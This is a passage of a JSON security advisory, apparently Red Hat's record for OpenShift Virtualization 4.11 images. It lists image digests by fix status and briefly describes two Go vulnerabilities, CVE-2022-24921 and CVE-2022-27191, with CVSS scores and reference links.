"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2064857" } ], "notes": [ { "category": "description", "text": "A stack overflow flaw was found in Golang\u0027s regexp module, which can crash the runtime if the application using regexp accepts very long or arbitrarily long regexps from untrusted sources that have sufficient nesting depths. To exploit this vulnerability, an attacker would need to send large regexps with deep nesting to the application. Triggering this flaw leads to a crash of the runtime, which causes a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: regexp: stack exhaustion via a deeply nested expression", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw has been rated as a Moderate impact flaw because the exploitation of this flaw requires that an affected application accept arbitrarily long regexps from untrusted sources, which has inherent risks (even without this flaw), especially involving impacts to application availability.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-24921" }, { "category": "external", "summary": "RHBZ#2064857", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064857" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-24921", "url": "https://www.cve.org/CVERecord?id=CVE-2022-24921" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-24921", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24921" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk", "url": "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk" } ], "release_date": "2022-03-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: regexp: stack exhaustion via a deeply nested expression" }, { "cve": "CVE-2022-27191", "cwe": { "id": "CWE-327", "name": "Use of a Broken or Risky Cryptographic Algorithm" }, "discovery_date": "2022-03-16T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2064702" } ], "notes": [ { "category": "description", "text": "A broken cryptographic algorithm flaw was found in golang.org/x/crypto/ssh. This issue causes a client to fail authentication with RSA keys to servers that reject signature algorithms based on SHA-2, enabling an attacker to crash the server, resulting in a loss of availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: crash in a golang.org/x/crypto/ssh server", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP) the vulnerable golang.org/x/crypto/ssh package is bundled in many components. The affected code is in the SSH server portion that is not used, hence the impact by this vulnerability is reduced. Additionally the OCP installer components, that also bundle vulnerable golang.org/x/crypto/ssh package, are used only during the cluster installation process, hence for already deployed and running OCP clusters the installer components are considered as affected by this vulnerability but not impacted.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", 